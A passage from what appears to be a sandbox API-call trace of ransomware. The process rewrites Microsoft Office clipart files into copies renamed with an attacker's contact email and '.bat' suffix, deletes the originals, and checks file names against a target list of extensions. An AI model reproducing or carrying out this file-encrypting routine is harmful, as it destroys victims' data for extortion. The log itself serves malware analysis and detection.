Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0195.734] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151073.wmf")) returned 1 [0195.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF") returned 68 [0195.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF") returned 68 [0195.736] lstrlenW (lpString=".doc") returned 4 [0195.736] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0195.736] lstrlenW (lpString=".docx") returned 5 [0195.738] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0195.738] lstrlenW (lpString=".pdf") returned 4 [0195.738] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0195.738] lstrlenW (lpString=".xls") returned 4 [0195.738] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0195.738] lstrlenW (lpString=".xlsx") returned 5 [0195.738] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0195.738] lstrlenW (lpString=".ppt") returned 4 [0195.738] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0195.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF") returned 68 [0195.738] lstrlenW (lpString=".zip") returned 4 [0195.738] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0195.738] lstrlenW (lpString=".rar") returned 4 [0195.738] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0195.739] lstrlenW (lpString=".bz2") returned 4 [0195.739] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0195.739] lstrlenW (lpString=".7z") returned 3 [0195.739] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0195.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF") returned 68 [0195.739] lstrlenW (lpString=".dbf") returned 4 [0195.739] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0195.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF") returned 68 [0195.739] lstrlenW (lpString=".1cd") returned 4 [0195.739] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0195.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF") returned 68 [0195.739] lstrlenW (lpString=".jpg") returned 4 [0195.739] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0195.740] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.740] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152432.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0195.741] GetLastError () returned 0x0 [0195.741] ReadFile (in: hFile=0x390, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x406c, lpOverlapped=0x0) returned 1 [0195.743] WriteFile (in: hFile=0x334, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x4070, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x4070, lpOverlapped=0x0) returned 1 [0195.745] ReadFile (in: hFile=0x390, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0195.745] WriteFile (in: hFile=0x334, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0195.745] SetEndOfFile (hFile=0x334) returned 1 [0195.745] CloseHandle (hObject=0x334) returned 1 [0195.745] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.746] SetEndOfFile (hFile=0x390) returned 1 [0195.747] CloseHandle (hObject=0x390) returned 1 [0195.747] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0195.747] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152432.wmf")) returned 1 [0195.748] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF") returned 68 [0195.748] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF") returned 68 [0195.748] lstrlenW (lpString=".doc") returned 4 [0195.748] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0195.748] lstrlenW (lpString=".docx") returned 5 [0195.748] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0195.748] lstrlenW (lpString=".pdf") returned 4 [0195.748] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0195.748] lstrlenW (lpString=".xls") returned 4 [0195.748] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0195.748] lstrlenW (lpString=".xlsx") returned 5 [0195.748] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0195.748] lstrlenW (lpString=".ppt") returned 4 [0195.749] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0195.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF") returned 68 [0195.749] lstrlenW (lpString=".zip") returned 4 [0195.749] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0195.749] lstrlenW (lpString=".rar") returned 4 [0195.749] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0195.749] lstrlenW (lpString=".bz2") returned 4 [0195.749] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0195.749] lstrlenW (lpString=".7z") returned 3 [0195.749] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0195.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF") returned 68 [0195.749] lstrlenW (lpString=".dbf") returned 4 [0195.749] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0195.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF") returned 68 [0195.749] lstrlenW (lpString=".1cd") returned 4 [0195.749] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0195.749] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF") returned 68 [0195.749] lstrlenW (lpString=".jpg") returned 4 [0195.749] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0195.750] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.750] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.750] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152436.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0195.750] GetLastError () returned 0x0 [0195.750] ReadFile (in: hFile=0x390, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x2c4c, lpOverlapped=0x0) returned 1 [0195.757] WriteFile (in: hFile=0x334, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x2c50, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x2c50, lpOverlapped=0x0) returned 1 [0195.760] ReadFile (in: hFile=0x390, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0195.760] WriteFile (in: hFile=0x334, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0195.760] SetEndOfFile (hFile=0x334) returned 1 [0195.760] CloseHandle (hObject=0x334) returned 1 [0195.760] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.761] SetEndOfFile (hFile=0x390) returned 1 [0195.761] CloseHandle (hObject=0x390) returned 1 [0195.762] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0195.762] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152436.wmf")) returned 1 [0195.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF") returned 68 [0195.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF") returned 68 [0195.763] lstrlenW (lpString=".doc") returned 4 [0195.763] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0195.763] lstrlenW (lpString=".docx") returned 5 [0195.763] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0195.763] lstrlenW (lpString=".pdf") returned 4 [0195.763] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0195.763] lstrlenW (lpString=".xls") returned 4 [0195.763] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0195.763] lstrlenW (lpString=".xlsx") returned 5 [0195.763] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0195.763] lstrlenW (lpString=".ppt") returned 4 [0195.763] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0195.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF") returned 68 [0195.763] lstrlenW (lpString=".zip") returned 4 [0195.763] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0195.763] lstrlenW (lpString=".rar") returned 4 [0195.763] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0195.763] lstrlenW (lpString=".bz2") returned 4 [0195.763] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0195.763] lstrlenW (lpString=".7z") returned 3 [0195.763] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0195.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF") returned 68 [0195.766] lstrlenW (lpString=".dbf") returned 4 [0195.766] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0195.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF") returned 68 [0195.766] lstrlenW (lpString=".1cd") returned 4 [0195.766] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0195.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF") returned 68 [0195.766] lstrlenW (lpString=".jpg") returned 4 [0195.766] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0195.767] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.767] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152558.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0195.768] GetLastError () returned 0x0 [0195.768] ReadFile (in: hFile=0x390, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x3eb4, lpOverlapped=0x0) returned 1 [0195.770] WriteFile (in: hFile=0x334, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x3ec0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x3ec0, lpOverlapped=0x0) returned 1 [0195.771] ReadFile (in: hFile=0x390, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0195.771] WriteFile (in: hFile=0x334, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0195.771] SetEndOfFile (hFile=0x334) returned 1 [0195.771] CloseHandle (hObject=0x334) returned 1 [0195.772] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.772] SetEndOfFile (hFile=0x390) returned 1 [0195.773] CloseHandle (hObject=0x390) returned 1 [0196.335] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.335] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152558.wmf")) returned 1 [0196.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF") returned 68 [0196.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF") returned 68 [0196.336] lstrlenW (lpString=".doc") returned 4 [0196.336] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.336] lstrlenW (lpString=".docx") returned 5 [0196.336] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0196.336] lstrlenW (lpString=".pdf") returned 4 [0196.336] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.336] lstrlenW (lpString=".xls") returned 4 [0196.336] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.336] lstrlenW (lpString=".xlsx") returned 5 [0196.336] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0196.337] lstrlenW (lpString=".ppt") returned 4 [0196.337] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF") returned 68 [0196.337] lstrlenW (lpString=".zip") returned 4 [0196.337] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.337] lstrlenW (lpString=".rar") returned 4 [0196.337] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.337] lstrlenW (lpString=".bz2") returned 4 [0196.337] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.337] lstrlenW (lpString=".7z") returned 3 [0196.337] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF") returned 68 [0196.338] lstrlenW (lpString=".dbf") returned 4 [0196.338] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF") returned 68 [0196.338] lstrlenW (lpString=".1cd") returned 4 [0196.338] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF") returned 68 [0196.338] lstrlenW (lpString=".jpg") returned 4 [0196.338] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.340] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.340] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.341] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152600.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0196.341] GetLastError () returned 0x0 [0196.341] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x2628, lpOverlapped=0x0) returned 1 [0196.345] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x2630, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x2630, lpOverlapped=0x0) returned 1 [0196.347] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.347] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.347] SetEndOfFile (hFile=0x3a0) returned 1 [0196.347] CloseHandle (hObject=0x3a0) returned 1 [0196.347] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.347] SetEndOfFile (hFile=0x37c) returned 1 [0196.348] CloseHandle (hObject=0x37c) returned 1 [0196.348] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.349] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152600.wmf")) returned 1 [0196.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF") returned 68 [0196.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF") returned 68 [0196.350] lstrlenW (lpString=".doc") returned 4 [0196.350] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.350] lstrlenW (lpString=".docx") returned 5 [0196.350] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0196.350] lstrlenW (lpString=".pdf") returned 4 [0196.350] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.350] lstrlenW (lpString=".xls") returned 4 [0196.350] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.350] lstrlenW (lpString=".xlsx") returned 5 [0196.350] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0196.350] lstrlenW (lpString=".ppt") returned 4 [0196.350] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF") returned 68 [0196.350] lstrlenW (lpString=".zip") returned 4 [0196.350] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.350] lstrlenW (lpString=".rar") returned 4 [0196.350] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.350] lstrlenW (lpString=".bz2") returned 4 [0196.350] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.350] lstrlenW (lpString=".7z") returned 3 [0196.350] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF") returned 68 [0196.350] lstrlenW (lpString=".dbf") returned 4 [0196.350] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF") returned 68 [0196.350] lstrlenW (lpString=".1cd") returned 4 [0196.351] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152600.WMF") returned 68 [0196.351] lstrlenW (lpString=".jpg") returned 4 [0196.351] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.355] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.356] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.356] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152602.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0196.357] GetLastError () returned 0x0 [0196.357] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1884, lpOverlapped=0x0) returned 1 [0196.359] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1890, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1890, lpOverlapped=0x0) returned 1 [0196.360] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.360] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.360] SetEndOfFile (hFile=0x3a0) returned 1 [0196.361] CloseHandle (hObject=0x3a0) returned 1 [0196.361] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.361] SetEndOfFile (hFile=0x37c) returned 1 [0196.362] CloseHandle (hObject=0x37c) returned 1 [0196.362] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.362] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152602.wmf")) returned 1 [0196.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF") returned 68 [0196.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF") returned 68 [0196.363] lstrlenW (lpString=".doc") returned 4 [0196.363] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.363] lstrlenW (lpString=".docx") returned 5 [0196.363] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0196.363] lstrlenW (lpString=".pdf") returned 4 [0196.363] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.363] lstrlenW (lpString=".xls") returned 4 [0196.363] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.363] lstrlenW (lpString=".xlsx") returned 5 [0196.363] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0196.363] lstrlenW (lpString=".ppt") returned 4 [0196.363] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF") returned 68 [0196.363] lstrlenW (lpString=".zip") returned 4 [0196.364] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.364] lstrlenW (lpString=".rar") returned 4 [0196.364] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.364] lstrlenW (lpString=".bz2") returned 4 [0196.364] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.364] lstrlenW (lpString=".7z") returned 3 [0196.364] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152602.WMF") returned 68 [0196.364] lstrlenW (lpString=".dbf") returned 4 [0196.364] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.364] lstrlenW (lpString="C:\\Program Files\\Microsoft 